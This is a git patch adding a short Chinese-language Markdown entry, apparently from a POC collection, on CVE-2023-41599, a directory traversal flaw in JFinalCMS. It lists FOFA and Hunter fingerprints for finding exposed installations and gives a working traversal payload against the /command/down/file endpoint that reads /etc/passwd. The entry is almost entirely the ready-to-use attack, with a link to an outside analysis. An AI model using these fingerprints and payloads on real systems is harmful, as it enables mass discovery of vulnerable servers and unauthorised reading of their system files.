From 0561f20ed5621661084e061405b6f5e2137bdefe Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 20 Sep 2023 17:48:03 +0800 Subject: [PATCH] =?UTF-8?q?Create=20JFinalCMS=20=E4=BB=BB=E6=84=8F?= =?UTF-8?q?=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E(CVE-2023?= =?UTF-8?q?-41599).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md diff --git a/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md b/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md new file mode 100644 index 0000000..cea75be --- /dev/null +++ b/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md @@ -0,0 +1,23 @@ +## JFinalCMS 任意文件读取漏洞(CVE-2023-41599) + + +## 特征 +```fofa: + +body="content=\"JreCms" + +hunter: + +web.body="content=\"JreCms" +``` +## POC +``` +Windows: /../../../../../../../../../test.txt +Linux: /../../../../../../../../../etc/passwd + +/command/down/file?filekey=/../../../../../../../../../etc/passwd +``` + + +## 漏洞分析 +http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/